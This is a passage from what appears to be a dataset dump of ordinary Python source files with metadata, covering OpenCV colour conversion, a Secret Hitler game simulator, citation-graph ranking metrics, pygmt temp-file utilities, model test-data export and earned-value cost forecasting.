+{"seq_id": "25794115374", "text": "import cv2\n\nimagem = cv2.imread(\"imagemTeste.jpg\")\n\n# Convertendo a imagem de RGB para HSV e depois segmentando\nimagem = cv2.cvtColor(imagem, cv2.COLOR_BGR2HSV)\nmatiz, saturacao, valor = cv2.split(imagem)\n\ncv2.imshow(\"Canal H\", matiz)\ncv2.imshow(\"Canal S\", saturacao)\ncv2.imshow(\"Canal V\", valor)\n\n# Combinando as imagens segmentadas\nimagem = cv2.merge((matiz, saturacao, valor))\nimagem = cv2.cvtColor(imagem, cv2.COLOR_HSV2BGR)\n\ncv2.imshow(\"Imagem\", imagem)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "repo_name": "ThayDias/visao-computacional", "sub_path": "Introducao a Visao Computacional/4. Representação de Cores no Espaço/converterRGBparaHSV.py", "file_name": "converterRGBparaHSV.py", "file_ext": "py", "file_size_in_byte": 498, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "1049999743", "text": "import random\nfrom Agent import *\nfrom argparse import ArgumentParser\nimport sys, inspect\nimport importlib\n\n'''\nSH_Game is a class that step by step simulates the game of Secret Hitler\n - do_round() simulates one round of the game\n - records what happens during the game\n - supplies agents with appropriate info\n'''\nclass SH_Game:\n #initialization\n def __init__(self):\n self.agents = []\n self.president = None\n self.last_candidate = None\n self.last_president = None\n self.last_chancellor = None\n self.election_tracker = 0\n self.deck = [] # liberal cards are 0, fascist cards are 1\n self.discard_pile = []\n self.lib_policy = 0 # counters for how many lib/fas policies have been played\n self.fas_policy = 0\n self.winner = None # 'L' if liberals win and 'F' if fascists win\n self.win_method = None #report on how the winning team won\n self.can_veto = False\n self.special_election = False\n #this is a list of dictionaries that store info on all of the \"game events\"\n self.history=[]\n \n #called at the start of the game\n def new_game(self,player_count,lib_agnt,fas_agnt,hit_agnt):\n #general initialization\n self.__init__()\n #initialize the agents, with number of roles respective to game\n lib_count = 3 + int((player_count-4)/2)\n fas_count = 1 + int((player_count-5)/2)\n #liberals\n libs = [lib_agnt('L',self) for i in range(lib_count)]\n #fascists\n fasc = [fas_agnt('F',self) for i in range(fas_count)]\n #hitler\n self.agents = libs + fasc + [hit_agnt('H',self)]\n #have the agents sit in random order and update their indexes\n random.shuffle(self.agents)\n for i in range(player_count):\n self.agents[i].index = i\n #randomly select a first president\n self.president = self.agents[0]\n #put cards into the deck, no cards played yet; 6 liberal 11 fascist\n self.deck = [0 for _ in range(6)] + [1 for _ in range(11)]\n random.shuffle(self.deck)\n \n \n #getters\n #returns self.winner (None for in-progress game, L for libs, F for fascists)\n def win(self):\n return self.winner\n \n #returns a string explaining how the winners won: None if no winner\n def result(self):\n if self.winner==None: return None\n if self.lib_policy==5:\n return 'liberal cards'\n if self.fas_policy==6:\n return 'fascist cards'\n for agent in self.agents:\n if agent.role=='H' and agent.is_dead:\n return 'dead hitler'\n return 'elected hitler'\n \n #prints the history of the game in a readable format\n def print_game(self):\n #print the roles of every player\n for a in self.agents:\n if a.role=='F':\n print('*Player ' + str(a.index) + ' is a fascist.')\n for a in self.agents:\n if a.role=='H':\n print('*Player ' + str(a.index) + ' is Hitler.')\n print('')\n \n #print every sequential event in the game\n L = 0\n F = 0\n for event in self.history:\n e = event['event']\n p = None\n if 'president' in event: p=str(event['president'])\n if e=='election':\n print('There are ' + str(L) + ' liberal polcies and ' + str(F) + ' fascist policies that have been played.')\n print('Player '+p+' is the president and picks player '+str(event['chancellor'])+' for chancellorship.')\n print('Everyone votes on this pair: '+str(event['votes']))\n if event['result']!='failure':\n print('The vote succeeds.')\n if event['result']=='Hitler':\n print('Hitler has been elected chancellor.')\n else:\n print('*The president picks up the cards: ' + str(event['pres_hand']))\n print('*The chancellor receives the cards: ' + str(event['chanc_hand']))\n if event['result']=='veto':\n print('The president and chancellor agree to veto this hand.')\n else:\n print('A ' + ('fascist' if event['result']==1 else 'liberal') + ' policy is played by the chancellor.')\n print('The president claims to have received: ' + str(event['pres_claim']))\n print('The chancellor claims to have received: ' + str(event['chanc_claim']))\n if event['result']==1: F += 1\n else: L += 1 \n else:\n print('The vote fails.')\n if e=='breakfast':\n print('Three presidencies have failed in a row. The top card, a' + (' fascist' if event['card'] else ' liberal') + ', is played.')\n if event['card']: F += 1\n else: L += 1\n if e=='reshuffle':\n print('The deck is reshuffled.')\n if e=='investigation':\n print('President ' + p + ' investigates player ' + str(event['invest']) + ' and claims they are ' + event['pres_claim']+'.')\n if e=='top three':\n print('President ' + p + ' looks at the top three cards and claims to see: ' + str(event['claim'])+'. *Actual: ' + str(event['cards']))\n if e=='special_election':\n print('Special Election: President ' + p + ' chooses player ' + str(event['new_pres']) + ' to be the next president.')\n if e=='kill':\n print('President ' + p + ' kills player ' + str(event['killed']) + '!')\n print('')#space between events\n \n #print the final game result\n print('Game Result: ' + game.result() + '\\n')\n \n #setters\n #checks to see if we need to reshuffle the deck:\n # > when there are less than 3 cards available\n def reshuffle(self):\n #reshuffle check if need be\n if len(self.deck) < 3: \n self.history += [{'event':'reshuffle'}]\n #combine discard pile into deck\n self.deck = self.deck + self.discard_pile\n self.discard_pile = []\n #shuffle deck\n random.shuffle(self.deck)\n return True\n return False\n \n #plays the given card\n def play_card(self,card):\n #if liberal card\n if card==0:\n self.lib_policy += 1\n #if fascist card\n else:\n self.fas_policy += 1\n #victory by cards played\n if self.lib_policy == 5:\n self.winner = 'L'\n if self.fas_policy == 6:\n self.winner = 'F'\n\n #called when an election fails or if veto power is used\n def increment_election_tracker(self):\n self.election_tracker += 1\n #third failed presidency\n if self.election_tracker==3:\n #randomly play top card, reset election traker, and reset 'term limits'\n card = self.deck.pop()\n self.history += [{'event':'breakfast','card':card}]\n self.play_card(card)\n self.election_tracker = 0 \n self.last_president = None\n self.last_chancellor = None\n \n #core game logic\n def do_round(self):\n N = len(self.agents)\n\n #assume this presidency will fail and then update otherwise \n event= {'event':'election'}\n event['pres_hand']=event['pres_claim']=event['chanc_hand']=event['chanc_claim']=None\n event['result'] = 'failure'\n \n\t\t# if need be, reshuffle the deck before the round starts\n self.reshuffle()\n \n\t\t# the predetermined president selects a chancellor from the list of valid options,\n # and the whole group votes on this decision\n president = self.president\n event['president'] = president.index\n if not self.special_election:\n self.last_candidate = president\n #reset special election\n self.special_election = False\n #give the president his options for chancellor\n options = [a for a in self.agents]\n for a in self.agents:\n # NOTE: last elected president may be available depending on number of players\n if a.is_dead or a==president or a == self.last_chancellor or (sum([0 if agnt.is_dead else 1 for agnt in self.agents])>5 and a == self.last_president):\n options.remove(a)\n chancellor = president.select_chancellor(options)\n event['chancellor'] = chancellor.index\n votes = []\n for agent in self.agents:\n if not agent.is_dead:\n votes.append(agent.vote(president,chancellor))\n else:\n votes.append(0)\n event['votes'] = votes\n \n pick = None\n #successful presidency: most living people voted yes\n if sum(votes) > sum([0 if a.is_dead else 1 for a in self.agents])/2:\n #update last president/chancellor\n self.last_president = president\n self.last_chancellor = chancellor\n self.election_tracker = 0\n # when at least three fascist cards have been played,\n # fascists can win by electing hitler as chancellor\n if self.fas_policy >= 3 and chancellor.role=='H':\n #the chancellor is hiter -> fascists win\n self.winner = 'F'\n event['result'] = 'Hitler'\n self.history += [event]\n else:\n #do legislation: president gets top three cards\n hand = [self.deck.pop() for _ in range(3)]\n event['pres_hand'] = [x for x in hand] #copy list\n #store president's claim\n p_claim = president.pres_claim(chancellor,hand)\n event['pres_claim'] = p_claim\n #president discards one of these cards\n pick = president.pres_discard(chancellor,hand)\n hand.remove(pick)\n self.discard_pile.append(pick)\n event['chanc_hand'] = [x for x in hand] #copy list\n #store chancellor's claim\n c_claim = chancellor.chanc_claim(hand)\n event['chanc_claim'] = c_claim\n pick = None \n #if veto power is unlocked then the chancellor and president\n #can agree to play neither of the policies: end of round\n if self.can_veto and president.veto(hand,True) and chancellor.veto(hand,False):\n event['result'] = 'veto' #no card is played\n self.discard_pile += hand\n self.increment_election_tracker()\n else:\n #chancellor picks one of the two remaining cards, discards the other\n pick = chancellor.chancellor_pick(hand)\n event['result'] = pick \n hand.remove(pick)\n self.discard_pile += hand\n self.play_card(pick)\n \n #add this election & legislation to the history of events\n self.history += [event]\n \n #if a fascist card is played, account for president powers\n if pick == 1:\n #small game president powers\n if N < 7:\n self.reshuffle()\n #look at top three cards\n if self.fas_policy==3:\n top = self.deck[-3:]\n claim = president.top_three(top)\n self.history += [{'event':'top three',\n 'cards':[x for x in top],\n 'president':president.index,\n 'claim':claim}]\n #large game president powers\n else:\n #investigation\n #in very large game 9-10, first fascist played results in an investigation\n if (N > 8 and self.fas_policy==1) or self.fas_policy==2:\n ops = [a for a in self.agents]\n ops.remove(president)\n invest,claim = president.investigation(ops)\n accusation = 0\n if claim=='L': accusation = 1\n if claim=='F': accusation = 2\n actual = 1\n if invest.get_role()=='L': actual = 0\n self.history += [{'event':'investigation',\n 'president':president.index,\n 'invest':invest.index,\n 'pres_claim':claim}]\n #special election\n if self.fas_policy==3:\n #the president select another player to be president for the next round\n ops = []\n for agent in self.agents:\n if agent.is_dead or agent==president: continue\n ops.append(agent)\n self.president = president.pres_special(ops)\n self.special_election = True\n # add special election to history of events\n self.history += [{'event':'special_election',\n 'president':president.index,\n 'new_pres':self.president.index}]\n #general game powers\n #kill\n if self.fas_policy==4 or self.fas_policy==5:\n ops = []\n for agent in self.agents:\n if not agent.is_dead:\n ops.append(agent)\n kill = president.kill(ops)\n kill.is_dead = True\n self.history += [{'event':'kill',\n 'president':president.index,\n 'killed':kill.index}]\n #if hitler is killed, liberals win\n if kill.role=='H':\n self.winner ='L'\n #veto power unlocked\n if self.fas_policy==5:\n self.can_veto = True\n #failed presidency\n else:\n self.history += [event]\n self.increment_election_tracker()\n # shift presidency left of last candidate for presidency\n if not self.special_election:\n #dead people can't be president!\n index = (self.last_candidate.index - 1)%N\n while self.agents[index].is_dead:\n index = (index - 1)%N\n self.president = self.agents[index]\n return None\n \n #looping of core game logic until a victor is found\n def play_game(self):\n while not self.win():\n self.do_round()\n return self.win()\n\nif __name__=='__main__':\n parser = ArgumentParser()\n parser.add_argument(\"-l\", \"--liberal\", required=False, default='GenericLiberalAgent', help=\"The agent (strategies) to be used by all liberal players.\")\n parser.add_argument(\"-f\", \"--fascist\", required=False, default='GenericFascistAgent', help=\"The agent (strategies) to be used by all fascist players.\")\n parser.add_argument(\"-r\", \"--hitler\", required=False, default='GenericHitlerAgent', help=\"The agent (strategies) to be used by Hitler.\")\n parser.add_argument(\"-p\", \"--numPlayers\", required=False, default=5, help=\"The number of players in the game [5-10].\", type=int, choices={5,6,7,8,9,10})\n parser.add_argument(\"-n\", \"--numGames\", required=False, default=1, help=\"The number of games to run. Running a single game will print out the event details of that game.\", type=int)\n parser.add_argument(\"-a\", \"--all\", required=False, default='false', help=\"Iterates over all possible number of players [5-10], as opposed to just a specific number of players\", choices={'true', 'false'})\n args = parser.parse_args()\n \n game = SH_Game()\n \n if(args.liberal != GenericLiberalAgent and args.liberal not in sys.modules.keys()):\n raise ValueError('The optional arugment [liberal] must be an already included module')\n if(args.fascist != GenericFascistAgent and args.fascist not in sys.modules.keys()):\n raise ValueError('The optional arugment [fascist] must be an already included module')\n if(args.hitler != GenericHitlerAgent and args.hitler not in sys.modules.keys()):\n raise ValueError('The optional arugment [hitler] must be an already included module')\n if(args.numGames < 1):\n raise ValueError('Cannot run a non-positive number of games')\n \n # Convert all the input strings into instances of that agent\n module = importlib.import_module(args.liberal)\n class_ = getattr(module, args.liberal)\n l_a = class_\n \n module = importlib.import_module(args.fascist)\n class_ = getattr(module, args.fascist)\n f_a = class_\n \n module = importlib.import_module(args.hitler)\n class_ = getattr(module, args.hitler)\n h_a = class_\n \n N = args.numGames #N=1 to view a game, N=10000 for testing\n\n P = args.numPlayers\n \n for p in range(5,11):\n if args.all == 'false':\n if p != P:\n continue\n records = []\n result = [] \n\n for i in range(N):\n game.new_game(p, l_a, f_a, h_a)\n records.append(game.play_game())\n result.append(game.result()) \n if N == 1 and args.all == 'false':\n game.print_game()\n if N>1 or (N==1 and args.all == 'true'):\n print('with '+str(p)+' players, fascists win: '+str(sum([1 if x=='F' else 0 for x in records])/N))\n print('percent of the time')\n print('liberals win with cards: ' + str(sum([1 if x=='liberal cards' else 0 for x in result])/N))\n print('fascists win with cards: ' + str(sum([1 if x=='fascist cards' else 0 for x in result])/N))\n print('liberals kill hitler: ' + str(sum([1 if x=='dead hitler' else 0 for x in result])/N))\n print('fascists elect hitler: ' + str(sum([1 if x=='elected hitler' else 0 for x in result])/N))", "repo_name": "wippra/SH_Simulation", "sub_path": "secret_hitler.py", "file_name": "secret_hitler.py", "file_ext": "py", "file_size_in_byte": 18759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.shuffle", "line_number": 47, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 54, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 143, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 338, "usage_type": "call"}, {"api_name": "sys.modules.keys", "line_number": 349, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 349, "usage_type": "attribute"}, {"api_name": "sys.modules.keys", "line_number": 351, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 351, "usage_type": "attribute"}, {"api_name": "sys.modules.keys", "line_number": 353, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 353, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 359, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 363, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 367, "usage_type": "call"}]}
+{"seq_id": "24740063090", "text": "import numpy as np\nimport igraph as ig\n\n\ndef get_CiteRank(G, half_life, p=.85):\n \"\"\"\n Retuns the CiteRank of a graph\n (see https://arxiv.org/pdf/physics/0612122.pdf)\n\n CiteRank is a particular PersonalizedPage rank where the reset\n probabilities exponentially decay with age of the vertex.\n\n Parameters\n ----------\n G: igraph graph, assumes 'year' is a vertex atttribute\n\n half_life: the half life of the exponential decay i.e.\n reset_prob_i propto 2^(- age_i / half_life)\n\n Returns\n -------\n CiteRank\n \"\"\"\n\n # years of each case\n years = np.array(G.vs['year'])\n current_year = max(years)\n\n # compute exponentially decaying probabilities\n ages = current_year - years\n exp_weights = 2 ** (- ages/float(half_life))\n probs = exp_weights / exp_weights.sum()\n\n return G.personalized_pagerank(damping=p, reset=probs)\n\n\ndef get_CiteRankPoly(G, exponent, p=.85):\n \"\"\"\n Retuns the CiteRank of a graph\n (see https://arxiv.org/pdf/physics/0612122.pdf)\n\n CiteRank is a particular PersonalizedPage rank where the reset\n probabilities exponentially decay with age of the vertex.\n\n Parameters\n ----------\n G: igraph graph, assumes 'year' is a vertex atttribute\n\n exponent: the exponent of the decay i.e.\n reset_prob_i propto 1/(age + 1)^exponent\n\n Returns\n -------\n CiteRank\n \"\"\"\n # years of each case\n years = np.array(G.vs['year'])\n current_year = max(years)\n\n # compute exponentially decaying probabilities\n ages = current_year - years\n weights = 1.0 / (1.0 + ages) ** exponent\n probs = weights / weights.sum()\n\n return G.personalized_pagerank(damping=p, reset=probs)\n\n\ndef get_recent_citations(G, current_year, threshold):\n \"\"\"\n Number of citations in past T years\n\n Parameters\n ---------\n G: igraph object with 'year' vertex attributes\n\n current_year: current year\n\n threshold: how many years before to look\n\n Output\n ------\n Returns a list ordered by ig index of recent citations\n\n i.e. number citations that happend after current_year - threshold\n \"\"\"\n threshold_year = current_year - threshold\n return [get_citations_upto_(v, threshold_year) for v in G.vs]\n\n\ndef get_citations_upto_(v, threshold_year):\n \"\"\"\n Retunrs the recent citaions for a given vertex\n\n helper function for get_recent_citations\n\n Parameters\n ----------\n v: vertex object from igraph object\n\n threshold_year: get citations that happened after this year\n \"\"\"\n return len([ing for ing in v.neighbors(mode=\"IN\")\n if threshold_year <= ing['year']])\n\n\ndef get_reverse_graph(G):\n \"\"\"\n Reverses the eges of a graph\n\n Paramters\n ---------\n G: the graph to reverse\n\n Output\n ------\n reversed graph (does not include any vertex attributes)\n \"\"\"\n G_rev = ig.Graph(n=len(G.vs), directed=True)\n\n # get reversed edge list\n rev_EL = [(e[1], e[0]) for e in G.get_edgelist()]\n\n G_rev.add_edges(rev_EL)\n\n return G_rev\n", "repo_name": "idc9/law-net", "sub_path": "vertex_metrics_experiment/code/custom_vertex_metrics.py", "file_name": "custom_vertex_metrics.py", "file_ext": "py", "file_size_in_byte": 3021, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "igraph.Graph", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "18914510320", "text": "\"\"\"\nUtilities for dealing with temporary file management.\n\"\"\"\nimport os\nimport uuid\nfrom contextlib import contextmanager\nfrom tempfile import NamedTemporaryFile\n\nimport numpy as np\n\n\ndef unique_name():\n \"\"\"\n Generate a unique name.\n\n Useful for generating unique names for figures (otherwise GMT will plot\n everything on the same figure instead of creating a new one).\n\n Returns\n -------\n name : str\n A unique name generated by :func:`uuid.uuid4`\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass GMTTempFile:\n \"\"\"\n Context manager for creating closed temporary files.\n\n This class does not return a file-like object. So, you can't do\n ``for line in GMTTempFile()``, for example, or pass it to things that\n need file objects.\n\n Parameters\n ----------\n prefix : str\n The temporary file name begins with the prefix.\n suffix : str\n The temporary file name ends with the suffix.\n\n Examples\n --------\n >>> import numpy as np\n >>> with GMTTempFile() as tmpfile:\n ... # write data to temporary file\n ... x = y = z = np.arange(0, 3, 1)\n ... np.savetxt(tmpfile.name, (x, y, z), fmt=\"%.1f\")\n ... lines = tmpfile.read()\n ... print(lines)\n ... nx, ny, nz = tmpfile.loadtxt(unpack=True, dtype=float)\n ... print(nx, ny, nz)\n ...\n 0.0 1.0 2.0\n 0.0 1.0 2.0\n 0.0 1.0 2.0\n \n [0. 0. 0.] [1. 1. 1.] [2. 2. 2.]\n \"\"\"\n\n def __init__(self, prefix=\"pygmt-\", suffix=\".txt\"):\n args = dict(prefix=prefix, suffix=suffix, delete=False)\n with NamedTemporaryFile(**args) as tmpfile:\n self.name = tmpfile.name\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n if os.path.exists(self.name):\n os.remove(self.name)\n\n def read(self, keep_tabs=False):\n \"\"\"\n Read the entire contents of the file as a Unicode string.\n\n Parameters\n ----------\n keep_tabs : bool\n If False, replace the tabs that GMT uses with spaces.\n\n Returns\n -------\n content : str\n Content of the temporary file as a Unicode string.\n \"\"\"\n with open(self.name, mode=\"r\", encoding=\"utf8\") as tmpfile:\n content = tmpfile.read()\n if not keep_tabs:\n content = content.replace(\"\\t\", \" \")\n return content\n\n def loadtxt(self, **kwargs):\n \"\"\"\n Load data from the temporary file using numpy.loadtxt.\n\n Parameters\n ----------\n kwargs : dict\n Any keyword arguments that can be passed to numpy.loadtxt.\n\n Returns\n -------\n ndarray\n Data read from the text file.\n \"\"\"\n return np.loadtxt(self.name, **kwargs)\n\n\n@contextmanager\ndef tempfile_from_geojson(geojson):\n \"\"\"\n Saves any geo-like Python object which implements ``__geo_interface__``\n (e.g. a geopandas.GeoDataFrame or shapely.geometry) to a temporary OGR_GMT\n text file.\n\n Parameters\n ----------\n geojson : geopandas.GeoDataFrame\n A geopandas GeoDataFrame, or any geo-like Python object which\n implements __geo_interface__, i.e. a GeoJSON.\n\n Yields\n ------\n tmpfilename : str\n A temporary OGR_GMT format file holding the geographical data.\n E.g. '1a2b3c4d5e6.gmt'.\n \"\"\"\n with GMTTempFile(suffix=\".gmt\") as tmpfile:\n os.remove(tmpfile.name) # ensure file is deleted first\n ogrgmt_kwargs = dict(filename=tmpfile.name, driver=\"OGR_GMT\", mode=\"w\")\n try:\n # Using geopandas.to_file to directly export to OGR_GMT format\n geojson.to_file(**ogrgmt_kwargs)\n except AttributeError:\n # pylint: disable=import-outside-toplevel\n # Other 'geo' formats which implement __geo_interface__\n import json\n\n import fiona\n import geopandas as gpd\n\n with fiona.Env():\n jsontext = json.dumps(geojson.__geo_interface__)\n # Do Input/Output via Fiona virtual memory\n with fiona.io.MemoryFile(file_or_bytes=jsontext.encode()) as memfile:\n geoseries = gpd.GeoSeries.from_file(filename=memfile)\n geoseries.to_file(**ogrgmt_kwargs)\n\n yield tmpfile.name\n", "repo_name": "geodeepak/Pygmt", "sub_path": "pygmt/helpers/tempfile.py", "file_name": "tempfile.py", "file_ext": "py", "file_size_in_byte": 4335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "uuid.uuid4", "line_number": 24, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 107, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 130, "usage_type": "call"}, {"api_name": "fiona.Env", "line_number": 143, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 144, "usage_type": "call"}, {"api_name": "fiona.io.MemoryFile", "line_number": 146, "usage_type": "call"}, {"api_name": "fiona.io", "line_number": 146, "usage_type": "attribute"}, {"api_name": "geopandas.GeoSeries.from_file", "line_number": 147, "usage_type": "call"}, {"api_name": "geopandas.GeoSeries", "line_number": 147, "usage_type": "attribute"}, {"api_name": "contextlib.contextmanager", "line_number": 110, "usage_type": "name"}]}
+{"seq_id": "2825660779", "text": "#生成yml数据,将模型的输入与输出写入yml,用于进行部署的时候验证TensorRT结果是否对。\n#前面的代码\nfrom util.utils import *\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nimport torch\nimport time\nfrom util.prune_utils import *\nimport argparse\nfrom util.parse_config import *\n# from utils_junjie import tools, timer\nfrom utils_junjie.utils import *\nfrom utils_junjie.visualization import *\nfrom utils_junjie.get_module_list import *\nfrom PIL import Image\nimport cv2\nfrom collections import OrderedDict\n\nparser = argparse.ArgumentParser(description=\"demo for rotated image detection\")\nparser.add_argument('--model_name', type=str, default='rapid',\n help='the name of model')\nparser.add_argument('--model_def', type=str, default='cfg/prune_0.9_prune_rotate_detection_darknet53_256.cfg')\nparser.add_argument('--model', type=str, default='weights/rapid_pL1_dark53_Jan05-15_0.9_1_339000.pth',\n help='model path')\nparser.add_argument('--img_path', type=str, default='test/43264/JPEGImages',\n help='image path')\nparser.add_argument('--input_size', type=int, default=(256, 512))\nparser.add_argument('--conf_thres', type=float, default=0.5)\nparser.add_argument('--visualize', type=bool, default=True)\nparser.add_argument('--preprocess_type', type=str, default='cv2', choices=['cv2', 'torch'],\n help='image preprocess type')\nargs = parser.parse_args()\n\nmodule_defs = parse_model_config(args.model_def)\n# module_defs.pop(0)\nmodel = RotateDetectNet(module_defs)\npretrained_dict = torch.load(args.model)\nmodel.load_state_dict(pretrained_dict['model'])\nfor parameter in model.parameters():\n parameter.requires_grad = False\nmodel.eval()\nfs = cv2.FileStorage(\"/data/TrtInfer/samples/testcases0.ymal\",cv2.FileStorage_WRITE)\nfs.write(\"testcase_num\",5)\nfor number in range(5):\n # input = torch.randn(2,3,256,512)\n input_shape = (args.input_size[0], args.input_size[1],3)\n input = torch.randn(4, *input_shape)\n output = model(input)\n fs.write(\"testcase_input\"+str(number),input.cpu().numpy())\n for i in range(len(output)):\n fs.write(\"testcase_output\"+str(number)+\"_\"+str(i),output[i].detach().numpy())", "repo_name": "EvaceLi/dl_common_script", "sub_path": "produce_data.py", "file_name": "produce_data.py", "file_ext": "py", "file_size_in_byte": 2228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.FileStorage", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.FileStorage_WRITE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "74062761767", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\nimport pandas \nimport glob\nimport sys \nimport matplotlib.pyplot as plt\nfrom utils import find_column_indices, parse_date, MAPE\nfrom beta_static import beta_static_lookup \n\ndata_file = sys.argv[1]\ndfs = pandas.read_excel(f'data/{data_file}.xlsx', sheet_name=None,\n skiprows=1)\nsheetnames = list(dfs.keys())\n\nimport numpy as np\n\n\nimport os \nif not os.path.isdir(\"data\"):\n os.makedirs(\"data\")\nbaselines = dfs['Baseline Schedule'][['ID', 'Duration', 'Total Cost']].values\nbaselines[:,1] = [parse_date(x) for x in baselines[:,1]]\n# planned duration\nBAC = baselines[0,2]\ntracking_periods = [x for x in sheetnames if \"TP\" in x]\nn_tracking_periods = baselines[0,1] / (20*60)\nprint(\"BAC:\", BAC)\nprint(\"Number of tracking periods:\", n_tracking_periods)\n\ndef cost_forecasting_evm():\n # Col 0 = ID, col 12 = Duration\n beta = beta_static_lookup[data_file] \n ACs = [0] # init AT0 = 0\n EVs = [0]\n EAC_costs = [] # predict project duration\n start_test = False\n t = 1\n for period in tracking_periods:\n print(\"Tracking periods:\", period)\n cols = find_column_indices(dfs[period].values[1], [\"ID\", \"Actual Cost\", \"Earned Value (EV)\", \"Planned Value (PV)\"])\n data_period = dfs[period].values[2:, cols] \n assert (baselines[:,0] == data_period[:,0]).sum() == len(baselines), \"Wrong permutation!\"\n\n AC = data_period[0, 1]\n ACs.append(AC)\n EV = data_period[0, 2]\n PV = data_period[0, 3]\n if t >= (len(tracking_periods)*2/3):\n # if True:\n CPI = EV/AC\n EAC = (BAC-EV) / CPI + AC\n print(\"Predict EAC:\", EAC)\n EAC_costs.append(EAC)\n t+=1\n print(\"Project actual costs: \", data_period[0,1])\n mape, error = MAPE([ACs[-1]]*len(EAC_costs[:-1]), EAC_costs[:-1])\n print(\"EVM MAPE: \", mape)\n return error, mape\n\n\nif __name__ == '__main__':\n if not os.path.isdir(\"figures\"):\n os.makedirs(\"figures\")\n fp = open(f\"logs/costs/{data_file}.log\", \"w+\")\n fp.write(f\"Dataset\\tDynamic\\n\")\n error_static, mape = cost_forecasting_evm()\n fp.write(f\"{data_file}\\t{mape:.2f}\\n\")\n", "repo_name": "LeDinhPhuc/XSM_09", "sub_path": "costs-evm.py", "file_name": "costs-evm.py", "file_ext": "py", "file_size_in_byte": 2162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.parse_date", "line_number": 24, "usage_type": "call"}, {"api_name": "beta_static.beta_static_lookup", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.find_column_indices", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.MAPE", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "70315686887", "text": "from ipywidgets import widgets\nimport IPython\nfrom IPython.core.display import display\nfrom typing import List\n\n\nclass InteractiveDiagram:\n \"\"\"A dropdown widget wrapper\"\"\"\n def __init__(self, diagram_renderer, choices, description):\n def get_default_choice_key():\n return list(self.choices.keys())[0]\n\n def get_default_choice_value():\n val = list(self.choices.values())[0]\n if not isinstance(val, list) and not isinstance(val, tuple):\n return (val,)\n return val\n\n self.diagram_renderer = diagram_renderer\n self.choices = choices\n\n display(get_default_choice_key())\n\n self.choice_widget = widgets.Dropdown(\n options=self.choices.keys(),\n value=get_default_choice_key(),\n description=description,\n disabled=False,\n )\n dropdown_state_eventhandler = lambda change: self.dropdown_state_eventhandler(change)\n self.choice_widget.observe(dropdown_state_eventhandler, names='value')\n self._render(get_default_choice_key(), get_default_choice_value())\n\n def _render(self, choice, values):\n IPython.display.clear_output(wait=True)\n display(self.choice_widget)\n self.diagram_renderer(choice, *values)\n\n def dropdown_state_eventhandler(self, change):\n state_choice = 